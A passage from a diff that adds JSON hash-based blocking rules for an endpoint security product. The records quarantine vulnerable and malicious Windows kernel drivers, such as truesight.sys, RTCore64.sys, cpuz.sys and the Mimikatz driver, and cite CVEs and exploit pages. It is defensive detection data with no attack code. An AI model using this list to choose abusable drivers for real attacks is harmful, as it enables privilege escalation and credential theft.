+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152210Z",
+ "creation_date": "2026-03-23T11:45:31.152212Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c267cfb40ffc24533cbfde1f1f457948f1d07de9eafc24b27db8df1af71a7f79",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70a1889f-80f7-5b0a-9eab-2d3abfffbe92",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834609Z",
+ "creation_date": "2026-03-23T11:45:30.834612Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ec7ae3b91784e5d5a57ec6e9e89b66a18c6274b559c8d4890037f7e0651664b3",
+ "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70a71990-6094-5dc1-99fd-efcba9885d3f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618219Z",
+ "creation_date": "2026-03-23T11:45:29.618221Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618227Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9155470dc24449977d1be15a116b08705dd4c113a2eb4ab19a6000749ff4b100",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70ab1e16-e316-5a18-b8c0-83afd3077077",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ 
"username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985996Z",
+ "creation_date": "2026-03-23T11:45:29.985998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986004Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f929b77636026cc0c57a0bd95e4c61f0b28a65e60331807e32235947f5c67931",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70ad899c-c853-5a9c-8211-17df2dfd4c61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607258Z",
+ "creation_date": "2026-03-23T11:45:29.607260Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607265Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver 
(aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70b6c5ff-10e2-50b6-9e3b-2cebafff18de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155276Z",
+ "creation_date": "2026-03-23T11:45:31.155278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155283Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1287885c5c87886fcae9bd18ff9a82c0231451315f16f7ec1a8111673127161c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70c3f0ab-9bb0-59b6-af08-61bcba69338b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": 
"2026-03-23T11:45:31.825628Z",
+ "creation_date": "2026-03-23T11:45:31.825630Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "826267a0c3f7fe9aee8242accbf5563560988137702eb6dd8a14bf66790447cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70cd4617-678e-5297-8502-f918ed8e744a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613442Z",
+ "creation_date": "2026-03-23T11:45:29.613444Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613450Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fee4560f2160a951d83344857eb4587ab10c1cfd8c5cfc23b6f06bef8ebcd984",
+ "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash SHA256]",
+ "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70d4d297-8723-5420-9b23-963fb7396391",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813947Z",
+ "creation_date": "2026-03-23T11:45:31.813960Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813969Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60da0e6b6127b7298f24da50ea4f028f260a629efde08d6926180ee1a7466639",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70d7c968-5cea-5cc6-bca5-a5327bc47b82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611201Z",
+ "creation_date": "2026-03-23T11:45:29.611203Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ 
"endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611208Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "313a69d8eea6a933cffac0fa67d46ad9aef0815bb579fce7623d9be825888e30",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70e87570-d502-5f55-8b99-1bbd06c1c9c1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474274Z",
+ "creation_date": "2026-03-23T11:45:30.474277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f291f251d8ffc6c6c2f69b62e8d1153bdb83f54cf60ef9a4c6235db87bfb2c1a",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70e8e1af-9c87-5ebe-abdb-bfea8348e5eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ 
"effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808339Z",
+ "creation_date": "2026-03-23T11:45:31.808341Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808347Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a95ec5a6bd3798a928eff37d2657cb948542d9156d0ecce05c4083f5e2b62f9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70f067cd-c15a-5147-8d38-9791c5ba0ff7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500469Z",
+ "creation_date": "2026-03-23T11:45:31.500472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ 
"references": [],
+ "type": "hash",
+ "value": "2fdc8c7638c8d9bff60603f4c659c18916d25810c34f953d663a2dfd16fb5392",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70f120b3-746a-5b48-88e3-8449db36ce1c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826025Z",
+ "creation_date": "2026-03-23T11:45:30.826028Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0956447f87a96b886c728a621eee105ade5ffd1bdb1583171f0c74a0c5b0e56",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "712074ef-379a-51b6-8e2c-1c74c9bc6ab7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619354Z",
+ "creation_date": "2026-03-23T11:45:29.619356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619362Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "916c535957a3b8cbf3336b63b2260ea4055163a9e6b214f2a7005d6d36a4a677",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7120fac4-2366-5d19-b9df-3f2aa234b839",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970383Z",
+ "creation_date": "2026-03-23T11:45:29.970385Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "274ca13168b38590c230bddc2d606bbe8c26de8a6d79156a6c7d07265efe0fdf",
+ "comment": "Mimikatz 
kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71293ec7-8f9a-5cd3-81b1-529338fad8b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819970Z",
+ "creation_date": "2026-03-23T11:45:31.819974Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d96fb94a4c4fc4bb0a79270c4ea070b3204c4ee9979be2d69439d879b3b85e19",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71337250-7b58-51f3-9813-6ccdb1571a70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982573Z",
+ "creation_date": 
"2026-03-23T11:45:29.982575Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c2f3e9811f7d0c7463eaa1ee6f39c23f902f3797b80891590b43bbe0fdf0e51",
+ "comment": "Malicious Kernel Driver (aka daxin_blank5.sys) [https://www.loldrivers.io/drivers/0590655c-baa2-481a-b909-463534bd7a5e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "713fabed-fea3-5fe3-9330-c59582fc2528",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141310Z",
+ "creation_date": "2026-03-23T11:45:31.141312Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141317Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35b9c645469bdef383d63083d98bb947e3a1deab699d7984b86c1fe457ad260a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7142818b-a8e6-5562-8e06-e2092da083de",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984458Z",
+ "creation_date": "2026-03-23T11:45:29.984460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d61ce5874adb89b4e992df8df879b568d9c4136df568718a768cd807d789a726",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "71433f41-7133-5920-93d9-f85f7f8986b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155049Z",
+ "creation_date": "2026-03-23T11:45:31.155051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155056Z",
+ "rule_level": null,
+ 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c0c8aea44644c2488ee1a9ddce05f183e47d3b6edee56697b0e127582cead55", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7152878d-f71b-586f-97c5-5985a187cdfe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474682Z", + "creation_date": "2026-03-23T11:45:30.474686Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474695Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9534f81749245346003690ecd5bdbd0a2b7011fa402c4984477ee7b4f80ca95", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "71579d9d-aff0-5289-9136-5f691ea3300a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
